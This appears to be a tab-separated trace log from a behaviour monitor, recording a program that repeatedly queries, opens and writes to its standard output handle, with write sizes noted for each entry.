File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 100	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 122	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 126	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 119	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 118	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 98	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 119	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 122	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 122	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 147	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 133	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 127	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 124	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 134	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 131	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 127	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 134	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 149	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 127	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 127	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 92	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 138	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 105	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 109	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 100	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 79	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 83	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 80	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 104	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 87	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 89	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 85	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 87	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 85	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 86	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 71	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 72	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 17	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 125	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 45	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 51	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 70	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 76	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 76	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 89	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 83	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 35	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 82	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 17	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 17	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 58	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 68	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 75	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 76	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 61	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 61	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 63	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 73	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 75	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 72	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 67	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 72	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 50	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 52	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 53	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 78	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 90	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 79	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 76	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 80	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 76	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 83	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 99	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 81	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 80	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 99	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 93	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 76	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 81	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 83	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 93	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 91	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 82	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 76	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 75	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 79	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 17	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 84	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 59	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 80	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 81	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 83	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 82	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 34	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 64	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 73	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 105	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 71	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 87	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 38	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 47	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 74	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 70	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 71	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 123	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 82	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 82	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 98	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 67	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 73	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 74	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
